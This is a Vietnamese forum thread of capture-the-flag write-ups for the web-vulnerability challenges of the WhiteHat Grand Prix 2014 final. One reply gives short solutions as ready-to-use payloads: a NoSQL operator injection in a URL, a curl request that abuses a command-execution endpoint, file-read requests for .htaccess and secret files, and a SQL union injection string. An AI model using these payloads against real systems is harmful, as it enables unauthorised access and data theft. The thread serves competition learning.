[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

BkavCR · 30/10/2014

Topic này được tạo để các bạn viết, trao đổi thảo luận về Writeup Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014.

Đề thi: Mời bạn đăng nhập vào trang http://grandprix.whitehat.vn/ bằng tài khoản và mật khẩu WhiteHat Forum để lấy đề thi.

REBD

Re: [Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

Web100:

Mã:

http://103.237.98.38/web100/index.php?name[$ne]=abc

Web300:

Mã:

curl -ik http://103.237.98.38/web300/execute.php -d "command=sha1sum&filename=login.php"
Down login.php -> decode -> flag

Web400:

Mã:

http://103.237.98.38/web400/

SQLi trong phần reg/login, mình ko nhớ rõ nhưng đại loại leak ở sessionid khi login.
Vào được admin -> http://103.237.98.38/web400/broken/data/download.php . đoán đc field ?file=download.php

view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/.htaccess
view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/_secret__

Web trong phần Att/Def:

Mã:

Lỗi nằm ở phần download file sau khi upload, đại loại là: -1' union select 1,'./flag/...' -- a

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

BkavCR

VIP Members

[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

BkavCR

VIP Members

Số người đang xem

Thống kê diễn đàn